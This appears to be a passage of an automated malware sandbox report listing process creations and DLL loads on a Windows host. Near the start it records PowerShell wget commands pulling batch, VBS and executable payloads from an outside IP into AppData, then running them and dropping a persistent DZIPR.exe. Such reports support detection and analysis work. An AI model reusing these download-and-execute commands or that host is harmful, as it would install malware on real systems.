Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe "C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe"
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.bat Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\user\AppData\Roaming/ffo.bat Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/hi.vbs -OutFile C:\Users\user\AppData\Roaming/hi.vbs Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c C:\Users\user\AppData\Roaming/hi.vbs Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hi.vbs" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ffo.bat" " Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/AUGUST.exe Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\AUGUST.exe C:\Users\user\AppData\Roaming/AUGUST.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Process created: C:\Users\user\DZIPR.exe "C:\Users\user\DZIPR.exe" Jump to behavior
Source: C:\Users\user\DZIPR.exe Process created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dlnashext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wpdshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\DZIPR.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\DZIPR.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\DZIPR.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\DZIPR.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\DZIPR.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\DZIPR.exe Section loaded: dzipr.dll Jump to behavior
Source: C:\Users\user\DZIPR.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\DZIPR.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\DZIPR.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\DZIPR.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\DZIPR.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Users\user\DZIPR.exe Section loaded: pla.dll Jump to behavior
Source: C:\Users\user\DZIPR.exe Section loaded: pdh.dll Jump to behavior
Source: C:\Users\user\DZIPR.exe Section loaded: tdh.dll Jump to behavior
Source: C:\Users\user\DZIPR.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Users\user\DZIPR.exe Section loaded: wevtapi.dll Jump to behavior
Source: C:\Users\user\DZIPR.exe Section loaded: shdocvw.dll Jump to behavior
Source: C:\Users\user\DZIPR.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: dzipr.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: pla.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: pdh.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: tdh.dll Jump to behavior
